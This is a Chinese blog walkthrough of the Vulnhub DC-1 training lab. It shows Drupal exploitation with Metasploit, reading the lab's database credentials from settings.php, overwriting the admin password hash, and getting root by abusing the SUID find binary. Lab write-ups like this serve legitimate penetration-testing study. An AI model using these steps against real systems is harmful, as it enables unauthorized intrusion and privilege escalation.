Loading

Vulnhub DC-1

Vulnhub DC-1

简介

DC-1是一个专门建造的易受攻击的实验室,目的是获得渗透测试领域的经验。

它是为初学者设计的一个A挑战,但它到底有多容易将取决于你的技能和知识,以及你的学习能力。

要成功地完成这一挑战,您将需要Linux技能、熟悉Linux命令行和基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。

有多种获取根目录的方法,但是,我包含了一些包含初学者线索的标志。

总共有五个标志,但最终目标是在root的主目录中找到并读取该标志。您甚至不需要是root用户才能执行此操作,但是,您将需要root权限。

根据你的技能水平,你可以跳过找到这些标志的大部分,直接去找根。

内网探测

使用命令 netdiscover

image-20201102170608624

找到ip 192.168.38.132

网站信息收集

image-20201102171147998

探测到cms为 drupal

使用msf攻击

在网络搜索到drupal存在远程命令执行漏洞

进入msfconsole 使用命令 search drupal

image-20201102232830488

使用模块 use 4

查看选项 show options

image-20201102232914822

设置选项 set rhosts 192.168.38.132

开始攻击 exploit

image-20201102233014190

得到flag1

image-20201102233203792

配置信息

提示查看配置文件 百度搜索其路径

image-20201102233317509

打开/sites/default/settings.php

image-20201102233602918

得到flag2

后台登录

根据配置文件可以得到数据库账号密码 并且根据提示产尝试进入数据库

      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-1:/var/www/sites/default$ //执行完之后可获得python提供的标准shell

查询到users表 得到管理员账户密码

image-20201103110410659

根据提示 密码不需要用暴力破解 可以将密码覆盖

image-20201103111100749

更新的密码为使用drupal自带加密加密123456的hash

进入后台

image-20201103111217033

得到flag3

image-20201103111237761

根据提示cat etc/passwd 得到用户

image-20201103111635367

可证明有flag4用户的home文件

image-20201103111739454

得到flag4 提示需要root权限

suid 提权

find / -perm -u=s -type f 2>/dev/null 查看拥有suid权限的命令

image-20201103112157135

/usr/bin/find a -exec whoami \; 使用find命令查看当前权限

image-20201103112249135

权限为root

/usr/bin/find a -exec '/bin/sh' \; 使用find函数来开启shell

image-20201103112432791

得到最终的flag

image-20201103112534598

总结

  1. 充分寻找网站指纹,然后利用好搜索引擎,会有意想不到的收获
  2. 查看配置信息
  3. 当数据库密码不可破解时,合理使用update和insert
  4. find / -perm -u=s -type f 2>/dev/null 查看拥有suid权限的命令
posted @ 2020-11-15 23:49  Th0r  阅读(117)  评论(0编辑  收藏  举报